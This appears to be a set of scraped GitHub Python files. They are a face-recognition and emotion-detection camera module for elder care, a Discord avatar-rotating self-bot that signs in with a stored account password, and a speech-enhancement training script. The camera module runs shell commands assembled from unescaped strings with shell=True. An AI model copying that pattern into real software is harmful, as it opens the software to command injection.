% current_time)\n\n# 传入参数\n# ap = argparse.ArgumentParser()\n# ap.add_argument(\"-f\", \"--filename\", required=False, default='',\n# help=\"\")\n# args = vars(ap.parse_args())\n# input_video = args['filename']\n\nclass Emotion_check:\n def __init__(self):\n self.facial_recognition_model_path = 'models/face_recognition_hog.pickle'\n self.facial_expression_model_path = 'models/miniGOOGLE_emotion_100_7.hdf5'\n\n self.output_stranger_path = 'supervision/strangers'\n self.output_smile_path = 'supervision/smile'\n\n self.people_info_path = 'info/people_info.csv'\n self.facial_expression_info_path = 'info/facial_expression_info.csv'\n # your python path\n self.python_path = 'C:/Users/whg/anaconda3/envs/tf/python'\n\n self.FACIAL_EXPRESSION_TARGET_WIDTH = 28\n self.FACIAL_EXPRESSION_TARGET_HEIGHT = 28\n\n self.VIDEO_WIDTH = 640\n self.VIDEO_HEIGHT = 480\n\n self.ANGLE = 20\n\n self.current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\n # 得到 ID->姓名的map 、 ID->职位类型的map、\n # 摄像头ID->摄像头名字的map、表情ID->表情名字的map\n self.id_card_to_name, self.id_card_to_type = fileassistant.get_people_info(\n self.people_info_path)\n self.facial_expression_id_to_name = fileassistant.get_facial_expression_info(\n self.facial_expression_info_path)\n\n # 控制陌生人检测\n self.strangers_timing = 0 # 计时开始\n self.strangers_start_time = 0 # 开始时间\n self.strangers_limit_time = 2 # if >= 2 seconds, then he/she is a stranger.\n\n # 控制微笑检测\n self.facial_expression_timing = 0 # 计时开始\n self.facial_expression_start_time = 0 # 开始时间\n self.facial_expression_limit_time = 2 # if >= 2 seconds, he/she is smiling\n\n # 初始化人脸识别模型\n self.faceutil = FaceUtil(self.facial_recognition_model_path)\n self.facial_expression_model = load_model(self.facial_expression_model_path)\n\n self.counter = 0\n\n def check_stranger_and_emotion(self, frame):\n self.counter += 1\n\n frame = imutils.resize(frame, width=self.VIDEO_WIDTH, height=self.VIDEO_HEIGHT) # 压缩,加快识别速度\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # grayscale,表情识别\n face_location_list, names = self.faceutil.get_face_location_and_name(frame)\n\n # 得到画面的四分之一位置和四分之三位置,并垂直划线\n one_fourth_image_center = (int(self.VIDEO_WIDTH / 4),\n int(self.VIDEO_HEIGHT / 4))\n three_fourth_image_center = (int(self.VIDEO_WIDTH / 4 * 3),\n int(self.VIDEO_HEIGHT / 4 * 3))\n\n cv2.line(frame, (one_fourth_image_center[0], 0),\n (one_fourth_image_center[0], self.VIDEO_HEIGHT),\n (0, 255, 255), 1)\n cv2.line(frame, (three_fourth_image_center[0], 0),\n (three_fourth_image_center[0], self.VIDEO_HEIGHT),\n (0, 255, 255), 1)\n\n # 处理每一张识别到的人脸\n for ((left, top, right, bottom), name) in zip(face_location_list,\n names):\n\n # 将人脸框出来\n rectangle_color = (0, 0, 255)\n if self.id_card_to_type[name] == 'old_people':\n rectangle_color = (0, 0, 128)\n elif self.id_card_to_type[name] == 'employee':\n rectangle_color = (255, 0, 0)\n elif self.id_card_to_type[name] == 'volunteer':\n rectangle_color = (0, 255, 0)\n else:\n pass\n cv2.rectangle(frame, (left, top), (right, bottom),\n rectangle_color, 2)\n\n # 陌生人检测逻辑\n if 'Unknown' in names: # alert\n if self.strangers_timing == 0: # just start timing\n self.strangers_timing = 1\n self.strangers_start_time = time.time()\n else: # already started timing\n strangers_end_time = time.time()\n difference = strangers_end_time - self.strangers_start_time\n\n self.current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n\n if difference > self.strangers_limit_time:\n event_desc = '陌生人出现!!!'\n event_location = '房间'\n print('[EVENT] %s, 房间, 陌生人出现!!!' 
% self.current_time)\n cv2.imwrite(os.path.join(self.output_stranger_path,\n 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S'))),\n frame) # snapshot\n\n # insert into database\n command = '%s inserting.py --event_desc %s --event_type 2 --event_location %s' % (\n self.python_path, event_desc, event_location)\n p = subprocess.Popen(command, shell=True)\n\n # 开始陌生人追踪\n unknown_face_center = (int((right + left) / 2),\n int((top + bottom) / 2))\n\n cv2.circle(frame, (unknown_face_center[0],\n unknown_face_center[1]), 4, (0, 255, 0), -1)\n\n direction = ''\n # face locates too left, servo need to turn right,\n # so that face turn right as well\n if unknown_face_center[0] < one_fourth_image_center[0]:\n direction = 'right'\n elif unknown_face_center[0] > three_fourth_image_center[0]:\n direction = 'left'\n\n # adjust to servo\n if direction:\n print('%d-摄像头需要 turn %s %d 度' % (self.counter,\n direction, self.ANGLE))\n\n else: # everything is ok\n self.strangers_timing = 0\n\n # 表情检测逻辑\n # 如果不是陌生人,且对象是老人\n if name != 'Unknown' and self.id_card_to_type[name] == 'old_people':\n # 表情检测逻辑\n roi = gray[top:bottom, left:right]\n roi = cv2.resize(roi, (self.FACIAL_EXPRESSION_TARGET_WIDTH,\n self.FACIAL_EXPRESSION_TARGET_HEIGHT))\n roi = roi.astype(\"float\") / 255.0\n roi = img_to_array(roi)\n roi = np.expand_dims(roi, axis=0)\n\n # determine facial expression\n arr = list(self.facial_expression_model.predict(roi)[0])\n labels = ['anger', 'disgust', 'fear', 'happy', 'normal', 'sad', 'surprised']\n max_prediction = max(arr)\n index = arr.index(max_prediction)\n if index == -1:\n facial_expression_label = labels[4]\n else:\n facial_expression_label = labels[index]\n\n if facial_expression_label == 'happy': # alert\n if self.facial_expression_timing == 0: # just start timing\n self.facial_expression_timing = 1\n self.facial_expression_start_time = time.time()\n else: # already started timing\n facial_expression_end_time = time.time()\n difference = facial_expression_end_time - self.facial_expression_start_time\n\n self.current_time = time.strftime('%Y-%m-%d %H:%M:%S',\n time.localtime(time.time()))\n if difference < self.facial_expression_limit_time:\n print(\n '[INFO] %s, 房间, %s仅笑了 %.1f 秒. 忽略.' % (\n self.current_time, self.id_card_to_name[name], difference))\n else: # he/she is really smiling\n event_desc = '%s正在笑' % (self.id_card_to_name[name])\n event_location = '房间'\n print('[EVENT] %s, 房间, %s正在笑.' 
% (self.current_time, self.id_card_to_name[name]))\n cv2.imwrite(os.path.join(self.output_smile_path,\n 'snapshot_%s.jpg' % (time.strftime('%Y%m%d_%H%M%S'))),\n frame) # snapshot\n\n # insert into database\n command = '%s inserting.py --event_desc %s --event_type 0 --event_location %s --old_people_id %d' % (\n self.python_path, event_desc, event_location, int(name))\n p = subprocess.Popen(command, shell=True)\n\n else: # everything is ok\n self.facial_expression_timing = 0\n\n else: # 如果是陌生人,则不检测表情\n facial_expression_label = ''\n\n # 人脸识别和表情识别都结束后,把表情和人名写上\n # (同时处理中文显示问题)\n img_PIL = Image.fromarray(cv2.cvtColor(frame,\n cv2.COLOR_BGR2RGB))\n\n draw = ImageDraw.Draw(img_PIL)\n final_label = self.id_card_to_name[name] + ': ' + self.facial_expression_id_to_name[\n facial_expression_label] if facial_expression_label else self.id_card_to_name[name]\n draw.text((left, top - 30), final_label,\n font=ImageFont.truetype(\"C:\\\\Windows\\\\Fonts\\\\SIMLI.TTF\", 30),\n fill=(255, 0, 0)) # windows\n\n # 转换回OpenCV格式\n frame = cv2.cvtColor(np.asarray(img_PIL), cv2.COLOR_RGB2BGR)\n\n return frame\n","repo_name":"huijieXue1020/CVpart","sub_path":"checkingstrangersandfacialexpression.py","file_name":"checkingstrangersandfacialexpression.py","file_ext":"py","file_size_in_byte":10934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21068148525","text":"import discord\r\nfrom discord.ext import commands, tasks\r\nfrom discord.ext.commands import Cog as cog\r\nfrom discord.ext.commands import command as cmd\r\nimport json\r\nimport random\r\nimport asyncio\r\nimport aiohttp\r\nimport re\r\nimport datetime as dt\r\n\r\ntry:\r\n import humanize\r\nexcept ImportError:\r\n humanize = None\r\n\r\nclass avatar_rotator(cog):\r\n def __init__(self, bot):\r\n self.bot = bot\r\n self.pfp_rotator.start()\r\n print(\"pfp.py has been loaded\")\r\n\r\n def cog_unload(self):\r\n self.pfp_rotator.cancel()\r\n\r\n @cmd(aliases=['copy'])\r\n async def steal(self, ctx, u: str = None):\r\n \"\"\"\r\n Copy someone else pfp and make it yours. You can also steal someone else avatar outside server by using their user ID\r\n\r\n You can use either their username#discrim, username, or nickname. You must be in same server as the target in for this to work. Using user ID is more recommended\r\n\r\n This command is case sensitive. 
If you mistyped one case letter, this will return error\r\n \"\"\"\r\n def get_password():\r\n with open('config/password', 'r') as f:\r\n password = f.readline()\r\n\r\n return password\r\n\r\n if not u:\r\n return await ctx.send(\"No target, try use username or user ID\")\r\n\t\t\t\r\n # This will check if you're using either user ID or by their username/nickname\r\n regex = re.match(r\"[0-9]{18}\", u)\r\n \r\n if not regex:\r\n # Try search member by using either username, or nickname otherwise return error NotFound\r\n try:\r\n u = await commands.MemberConverter().convert(ctx, u)\r\n except commands.BadArgument:\r\n return await ctx.send(\"member not found\")\r\n else:\r\n try:\r\n u = await self.bot.fetch_user(int(u))\r\n except discord.NotFound:\r\n return await ctx.send(\"user not found, perhaps you're using wrong ID?\")\r\n \r\n async with aiohttp.ClientSession() as cs: \r\n async with cs.get(str(u.avatar_url)) as r:\r\n av = await r.read()\r\n await self.bot.user.edit(avatar=av, password=get_password())\r\n self.bot.variables_last_link = av\r\n\r\n await ctx.message.add_reaction('☑️')\r\n\r\n @cmd(aliases=['setting', 'settings'])\r\n async def config(self, ctx: commands.Context, option, *, setting):\r\n \"\"\"\r\n Changes configuration files\r\n Available options\r\n cycle : change cycling style\r\n interval : how often it should change\r\n\r\n Settings format\r\n cycle : random | cycle\r\n interval : time format is 0d0h0m0s. For example, 6h for 6 hours\r\n \"\"\"\r\n\r\n # a simple time converter by using str.split to get and calculate the number\r\n def time_converter(time_string):\r\n if time_string.isdigit() == True:\r\n return time_string\r\n\r\n the_time = time_string\r\n total_seconds = 0\r\n\r\n if str(the_time).lower().find(\"d\") != -1:\r\n split, original_time = str(the_time).split(\"d\")\r\n days_to_seconds = int(split) * 86400\r\n total_seconds = total_seconds + int(days_to_seconds)\r\n the_time = original_time\r\n\r\n if str(the_time).lower().find(\"h\") != -1:\r\n split, original_time = str(the_time).split(\"h\")\r\n hours_to_seconds = int(split) * 3600\r\n total_seconds = total_seconds + int(hours_to_seconds)\r\n the_time = original_time\r\n\r\n if str(the_time).lower().find(\"m\") != -1:\r\n split, original_time = str(the_time).split(\"m\")\r\n minute_to_seconds = int(split) * 60\r\n total_seconds = total_seconds + int(minute_to_seconds)\r\n the_time = original_time\r\n\r\n if str(the_time).lower().find(\"s\") != -1:\r\n split, original_time = str(the_time).split(\"s\")\r\n seconds_to_second_lol = int(split) * 1\r\n total_seconds = total_seconds + int(seconds_to_second_lol)\r\n the_time = original_time\r\n\r\n return total_seconds\r\n\r\n # check if setting has available options, otherwise success return false\r\n def cycle_set(setting):\r\n success = False\r\n\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n\r\n if setting.lower() == \"random\":\r\n config['cycling style'] = setting\r\n\r\n with open('config/config.json', 'w') as f:\r\n json.dump(config, f, indent=4)\r\n\r\n success = True\r\n return success\r\n\r\n elif setting.lower() == \"cycle\":\r\n config['cycling style'] = setting\r\n\r\n with open('config/config.json', 'w') as f:\r\n json.dump(config, f, indent=4)\r\n\r\n success = True\r\n return success\r\n\r\n else:\r\n return success\r\n\r\n def interval_set(time_string):\r\n seconds = time_converter(time_string)\r\n\r\n if seconds == 0:\r\n return seconds\r\n\r\n with open('config/config.json', 'r') as f:\r\n config = 
json.load(f)\r\n\r\n config['interval'] = seconds\r\n\r\n with open('config/config.json', 'w') as f:\r\n json.dump(config, f, indent=4)\r\n\r\n return seconds\r\n\r\n if option.lower() == 'cycle':\r\n success = cycle_set(setting)\r\n if success == False:\r\n await ctx.send(\"Invalid setting provided, this setting only accept `random` or `cycle`\")\r\n else:\r\n await ctx.send(f\"☑️\")\r\n elif option.lower() == 'interval':\r\n seconds = interval_set(setting)\r\n\r\n if seconds == 0:\r\n await ctx.send(\"you can't set interval at 0 second\")\r\n return\r\n\r\n if humanize:\r\n delta = dt.timedelta(seconds=seconds)\r\n await ctx.send(f\"successfully changed interval to {humanize.precisedelta(delta)}\")\r\n else:\r\n await ctx.send(f\"successfully changed interval\")\r\n else:\r\n await ctx.send(\"There is no such option, available options: `cycle` `interval`\")\r\n\r\n @config.error\r\n async def config_error(self, ctx: commands.Context, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(error)\r\n\r\n @cmd(aliases=['av', 'pfp'])\r\n async def avatar(self, ctx, *, target = \"\"):\r\n \"\"\"Obtain someone else avatar in maximum resolution, also works if user didn't share mutual servers with the bot but ID is required for this to work\r\n For mass avatar, use multiple IDs, separate by space\r\n \"\"\"\r\n def to_jpg(user):\r\n url = user.avatar_url_as(format=\"jpg\", size=4096)\r\n return url\r\n\r\n def to_png(user):\r\n url = user.avatar_url_as(format=\"png\", size=4096)\r\n return url\r\n\r\n def to_webp(user):\r\n url = user.avatar_url_as(format=\"webp\", size=4096)\r\n return url\r\n\r\n def to_gif(user):\r\n if user.is_avatar_animated() == True:\r\n url = user.avatar_url_as(format=\"gif\", size=4096)\r\n text = f\" | [GIF]({url})\"\r\n return text\r\n else:\r\n not_animated = \"\"\r\n return not_animated\r\n\r\n def to_default(user):\r\n url = user.avatar_url_as(size=4096)\r\n return url\r\n\r\n try:\r\n tempvalue = target.replace(\" \", \"\")\r\n if target == \"\":\r\n embed = discord.Embed(color=discord.Color.green(), title=f\"{ctx.author.name}#{ctx.author.discriminator}'s avatar\", description=(f'[JPG]({to_jpg(ctx.author)}) | [PNG]({to_png(ctx.author)}) | [WebP]({to_webp(ctx.author)}){to_gif(ctx.author)}')) \r\n\r\n embed.set_image(url=to_default(ctx.author))\r\n await ctx.send(embed=embed)\r\n\r\n elif tempvalue.isdigit() == False: # if not using ID, search from get_user\r\n target_member = await commands.MemberConverter().convert(ctx, target) # convert it into user either based on mention, name, or name#discrim\r\n\r\n embed = discord.Embed(color=discord.Color.green(), title=f\"{target_member.name}#{target_member.discriminator}'s avatar\", description=(f'[JPG]({to_jpg(target_member)}) | [PNG]({to_png(target_member)}) | [WebP]({to_webp(target_member)}){to_gif(target_member)}')) \r\n\r\n embed.set_image(url=to_default(target_member))\r\n await ctx.send(embed=embed)\r\n\r\n elif tempvalue.isdigit() == True: # if using ID, use fetch_user\r\n target = target.split(\" \")\r\n for each in target:\r\n target_user = await self.bot.fetch_user(each)\r\n\r\n embed = discord.Embed(color=discord.Color.green(), title=f\"{target_user.name}#{target_user.discriminator}'s avatar\", description=(f'[JPG]({to_jpg(target_user)}) | [PNG]({to_png(target_user)}) | [WebP]({to_webp(target_user)}){to_gif(target_user)}')) \r\n\r\n embed.set_image(url=to_default(target_user))\r\n await ctx.send(embed=embed)\r\n except Exception as e:\r\n await ctx.send(e)\r\n\r\n 
@cmd(aliases=['next'])\r\n async def skip(self, ctx: commands.Context):\r\n \"\"\"\r\n Change your avatar, this command will either cycle or picks random avatar depending on your config\r\n \"\"\"\r\n await self.rotator()\r\n await ctx.message.add_reaction('☑️')\r\n\r\n @cmd(aliases=['skipto', 'jumpto'])\r\n async def jump(self, ctx, index: int):\r\n \"\"\"\r\n Change avatar to specified index on list\r\n \"\"\"\r\n def get_password():\r\n with open('config/password', 'r') as f:\r\n password = f.readline()\r\n\r\n return password\r\n\r\n with open('config/pfp.json', 'r') as f:\r\n pfp = json.load(f)\r\n\r\n try:\r\n avatar = pfp['links'][index - 1]\r\n except IndexError:\r\n return await ctx.send(\"index out of range\")\r\n\r\n try:\r\n async with aiohttp.ClientSession() as cs: \r\n async with cs.get(avatar) as r:\r\n av = await r.read()\r\n await self.bot.user.edit(avatar=av, password=get_password())\r\n self.bot.variables_last_link = av\r\n await ctx.send('☑️')\r\n except Exception as e:\r\n # this will raise if url is not an image or when you're hitting the ratelimit\r\n await ctx.send(e)\r\n \r\n @jump.error\r\n async def jump_error(self, ctx, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(error)\r\n if isinstance(error, commands.BadArgument):\r\n await ctx.send(\"index should be an integer\")\r\n\r\n @cmd(aliases=['avatars', 'links', 'link'])\r\n async def list(self, ctx: commands.Context, page_number: int = 1):\r\n \"\"\"\r\n Show list of all links inside pfp.json\r\n \"\"\"\r\n counter = 1\r\n\r\n with open(\"config/pfp.json\", 'r') as f:\r\n pfp = json.load(f)\r\n\r\n links = pfp[\"links\"]\r\n\r\n p = commands.Paginator(prefix='', suffix='')\r\n\r\n for link in links:\r\n p.add_line(line=f\"{str(counter)}. {link}\")\r\n counter += 1\r\n\r\n pages = p.pages\r\n total_pages = len(pages)\r\n\r\n if page_number <= 0:\r\n page_number = 1\r\n offset = 0\r\n elif page_number > total_pages:\r\n page_number = total_pages\r\n offset = -1\r\n else:\r\n offset = page_number - 1\r\n\r\n embed = discord.Embed(color=ctx.author.color, title='List of links', description=pages[offset])\r\n embed.set_footer(text=f\"Page {page_number}/{total_pages}\")\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @cmd(aliases=['rem', 'r'])\r\n async def remove(self, ctx: commands.Context, *, index: str):\r\n \"\"\"\r\n Remove a specific url inside json by using their index number shown at list/avatars command\r\n Accepts latest/l as an argument, this will delete most recent link\r\n Accepts bulk delete, separate numbers by space\r\n \"\"\"\r\n with open(\"config/pfp.json\", 'r') as f:\r\n pfp = json.load(f)\r\n links = pfp['links']\r\n\r\n counter = 0\r\n msg = \"\"\r\n\r\n index = index.split(\" \")\r\n index.sort(reverse=True) # reversed because after you delete an element, the list index will also updates. 
You'll get the idea\r\n for num in index:\r\n try:\r\n if num.lower() == 'l' or num.lower() == 'latest':\r\n num = -1\r\n else:\r\n num = int(num) -1\r\n result = links.pop(num)\r\n msg += result + \"\\n\"\r\n counter += 1\r\n except Exception:\r\n pass\r\n\r\n pfp['links'] = links\r\n with open(\"config/pfp.json\", 'w') as f:\r\n json.dump(pfp, f, indent=4)\r\n\r\n embed = discord.Embed(\r\n color=discord.Color.green(),\r\n title=f\"Successfully removed {counter} link{'s' if counter != 1 else ''}\",\r\n description=msg\r\n )\r\n\r\n await ctx.send(embed=embed)\r\n\r\n @remove.error\r\n async def remove_error(self, ctx: commands.Context, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(f\"You need to specify index number, you can view index number of each link by using `{ctx.prefix}list`\")\r\n\r\n @cmd(aliases=['add'])\r\n async def append(self, ctx, *, links: str):\r\n \"\"\"\r\n Appends an anther avatar into json, please use direct image url only\r\n Supports bulk links, separate them by space\r\n \"\"\"\r\n success = 0\r\n fails = 0\r\n fails_result = \"\"\r\n \r\n links = links.split(\" \")\r\n for link in links:\r\n # to ensure the ones you append is a link\r\n # regex stolen from geeksforgeeks.org lol\r\n regex_match = re.search(r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\", link)\r\n if regex_match == None:\r\n link += \"\\n\"\r\n fails_result += link\r\n fails += 1\r\n else:\r\n with open(\"config/pfp.json\", 'r') as f:\r\n j = json.load(f)\r\n\r\n j_links: list = j['links']\r\n j_links.append(link)\r\n\r\n j['links'] = j_links\r\n\r\n with open(\"config/pfp.json\", 'w') as f:\r\n json.dump(j, f, indent=4)\r\n \r\n success += 1\r\n\r\n # will pick either green or red depending if there any success\r\n def green_or_red():\r\n if success == 0:\r\n color = discord.Color.red()\r\n return color\r\n else:\r\n color = discord.Color.green()\r\n return color\r\n\r\n embed = discord.Embed(color=green_or_red(), description=f\"{success} link{'s' if success != 1 and success != 0 else ''} has been appended\\n{fails} is not a link\")\r\n embed.add_field(name=f\"Invalid link{'s' if fails != 1 and fails != 0 else ''}\", value=fails_result) if fails != 0 else None\r\n\r\n await ctx.send(embed=embed)\r\n \r\n @append.error\r\n async def append_error(self, ctx: commands.Context, error):\r\n if isinstance(error, commands.MissingRequiredArgument):\r\n await ctx.send(error)\r\n\r\n @tasks.loop()\r\n async def pfp_rotator(self):\r\n def get_interval_setting():\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n \r\n interval = config['interval']\r\n\r\n return interval\r\n\r\n await self.rotator()\r\n\r\n seconds = get_interval_setting()\r\n await asyncio.sleep(seconds)\r\n\r\n # the main rotator/cycle system\r\n async def rotator(self):\r\n # It need to wait for some time to connect it, without this bot.user will always return None\r\n if self.bot.variables_first_run == True:\r\n await asyncio.sleep(15)\r\n self.bot.variables_first_run = False\r\n\r\n def get_password():\r\n with open('config/password', 'r') as f:\r\n password = f.readline()\r\n\r\n return password\r\n\r\n def get_cycle_setting():\r\n with open('config/config.json', 'r') as f:\r\n config = json.load(f)\r\n \r\n setting = config['cycling style']\r\n\r\n return setting\r\n \r\n # cycle links inside pfp.json, it uses 
variable that will keep increasing by 1 until an index error raised\r\n def get_cycle_avatar(links):\r\n index = self.bot.variables_index\r\n while True:\r\n try:\r\n av = links[index]\r\n index += 1\r\n break\r\n except IndexError:\r\n index = 0\r\n\r\n # to ensure dupe avatar will not be used\r\n while self.bot.variables_last_link == av:\r\n try:\r\n index += 1\r\n av = links[index]\r\n except IndexError:\r\n index = 0\r\n\r\n self.bot.variables_index = index\r\n\r\n return av\r\n \r\n def get_random_avatar(links):\r\n av = random.choice(links)\r\n\r\n # to ensure dupe avatar will not be used\r\n while self.bot.variables_last_link == av:\r\n av = random.choice(links)\r\n\r\n return av\r\n\r\n try:\r\n with open(\"config/pfp.json\", 'r') as f:\r\n pfp = json.load(f)\r\n\r\n links = pfp[\"links\"]\r\n\r\n cycle = get_cycle_setting()\r\n\r\n if cycle == \"cycle\":\r\n avatar = get_cycle_avatar(links)\r\n\r\n else:\r\n avatar = get_random_avatar(links)\r\n\r\n async with aiohttp.ClientSession() as cs: \r\n async with cs.get(avatar) as r:\r\n av = await r.read()\r\n # password is required for user accounts for whatever reason, unnecessary for bot accounts\r\n await self.bot.user.edit(avatar=av, password=get_password())\r\n self.bot.variables_last_link = av\r\n except Exception as e:\r\n # this will usually raised when url is invalid, config/pfp json get messed up, or when you're hitting the ratelimit\r\n print(e)\r\n\r\ndef setup(bot):\r\n bot.add_cog(avatar_rotator(bot))","repo_name":"sinkingecstasies/discord-avatar-cycle","sub_path":"cogs/pfp.py","file_name":"pfp.py","file_ext":"py","file_size_in_byte":18972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26884523061","text":"from __future__ import absolute_import\r\nfrom __future__ import print_function\r\n\r\nimport numpy as np\r\nnp.random.seed(42) # for reproducibility\r\n\r\nfrom tqdm import tqdm\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom stft_dataset import STFTDataset\r\nfrom residual import ResidualModel\r\nfrom highway import HighwayModel\r\nfrom masking import MaskingModel\r\nfrom baseline import BaselineModel\r\nfrom pytorch_utils import TrainLoop, load_checkpoint\r\n\r\ndef load_data(window_size, step_size, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=step_size, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('ieee_reverb_only_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=step_size, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('ieee_reverb_only_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\ndef load_noisy_data(window_size, overlap, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('ieee_noisy_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('ieee_noisy_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\ndef load_noisy_timit(window_size, overlap, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n 
G_train.load_metadata_from_desc_file('timit_noisy_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('timit_noisy_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\ndef load_reverb_timit(window_size, overlap, use_log):\r\n print(\"Loading data...\")\r\n G_train = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_train.load_metadata_from_desc_file('timit_reverb_only_train.json')\r\n G_train.fit_stats()\r\n\r\n G_val = STFTDataset(window=window_size, step=overlap, use_log=use_log)\r\n G_val.load_metadata_from_desc_file('timit_reverb_only_valid.json')\r\n G_val.feats_mean = G_train.feats_mean\r\n G_val.feats_std = G_train.feats_std\r\n\r\n return G_train, G_val\r\n\r\n\r\n\r\ndef train_fn(model, optimizer, criterion, batch):\r\n x, y, lengths = batch\r\n\r\n x = Variable(x.cuda())\r\n y = Variable(y.cuda(), requires_grad=False)\r\n\r\n mask = Variable(torch.ByteTensor(x.size()).fill_(1).cuda(),\r\n requires_grad=False)\r\n for k, l in enumerate(lengths):\r\n mask[:l, k, :] = 0\r\n\r\n y_hat = model(x)\r\n\r\n # Apply mask\r\n y_hat.masked_fill_(mask, 0.0)\r\n y.masked_fill_(mask, 0.0)\r\n\r\n loss = criterion(y_hat, y)\r\n\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n return loss.data.item()\r\n\r\n\r\ndef valid_fn(model, criterion, batch):\r\n x, y, lengths = batch\r\n\r\n x = Variable(x.cuda(), volatile=True)\r\n y = Variable(y.cuda(), requires_grad=False)\r\n\r\n mask = Variable(torch.ByteTensor(x.size()).fill_(1).cuda(),\r\n requires_grad=False)\r\n for k, l in enumerate(lengths):\r\n mask[:l, k, :] = 0\r\n\r\n y_hat = model(x)\r\n\r\n # Apply mask\r\n y_hat.masked_fill_(mask, 0.0)\r\n y.masked_fill_(mask, 0.0)\r\n\r\n val_loss = criterion(y_hat, y).data.item()\r\n return val_loss\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n from argparse import ArgumentParser\r\n import os\r\n from glob import glob\r\n\r\n parser = ArgumentParser()\r\n\r\n parser.add_argument('--batch_size', type=int, default=32)\r\n parser.add_argument('--max_epochs', type=int, default=100)\r\n parser.add_argument('--num_hidden', type=int, default=256)\r\n parser.add_argument('--num_blocks', type=int, default=3)\r\n parser.add_argument('--num_layers_per_block', type=int, default=1)\r\n parser.add_argument('--learning_rate', type=float, default=1e-4)\r\n parser.add_argument('--model_type', default='residual')\r\n parser.add_argument('--window_size', type=int, default=32)\r\n parser.add_argument('--step_size', type=int, default=16)\r\n parser.add_argument('--data_type', default='reverb')\r\n parser.add_argument('--use_log', action='store_true')\r\n parser.add_argument('checkpoint_path')\r\n\r\n args = parser.parse_args()\r\n\r\n try:\r\n train_loop = load_checkpoint(args.checkpoint_path)\r\n except ValueError:\r\n print('No checkpoints, initializing a model from scratch...')\r\n window_size = args.window_size # in ms\r\n step_size = args.step_size\r\n n_input = int(1e-3*window_size*16000/2 + 1)\r\n n_output = n_input\r\n\r\n if args.model_type == 'residual':\r\n model = ResidualModel(n_input,\r\n args.num_blocks,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n elif args.model_type == 'highway':\r\n model = HighwayModel(n_input,\r\n args.num_blocks,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n elif args.model_type == 'masking':\r\n model = 
MaskingModel(n_input,\r\n args.num_blocks,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n elif args.model_type == 'baseline':\r\n model = BaselineModel(n_input,\r\n args.num_hidden,\r\n args.num_layers_per_block).cuda()\r\n else:\r\n raise ValueError('model_type has to be either \"residual\", \"highway\", or \"baseline\"')\r\n\r\n print(model)\r\n\r\n criterion = torch.nn.MSELoss()\r\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\r\n\r\n if args.data_type == 'reverb':\r\n print('Loading reverb dataset')\r\n G_train, G_val = load_data(window_size, step_size, args.use_log)\r\n elif args.data_type == 'noisy':\r\n print('Loading noisy dataset')\r\n G_train, G_val = load_noisy_data(window_size, step_size, args.use_log)\r\n elif args.data_type == 'noisy_timit':\r\n print('Loading noisy_timit dataset')\r\n G_train, G_val = load_noisy_timit(window_size, step_size, args.use_log)\r\n elif args.data_type == 'reverb_timit':\r\n G_train, G_val = load_reverb_timit(window_size, step_size, args.use_log)\r\n else:\r\n raise ValueError('data_type has to be either \"reverb\" or \"noisy\"')\r\n\r\n train_loader = DataLoader(G_train, batch_size=args.batch_size,\r\n collate_fn=G_train.collate_samples,\r\n num_workers=8, shuffle=True)\r\n valid_loader = DataLoader(G_val, batch_size=args.batch_size,\r\n collate_fn=G_train.collate_samples,\r\n num_workers=4)\r\n\r\n train_loop = TrainLoop(model,\r\n optimizer, criterion,\r\n train_fn, train_loader,\r\n valid_fn, valid_loader,\r\n checkpoint_path=args.checkpoint_path)\r\n\r\n 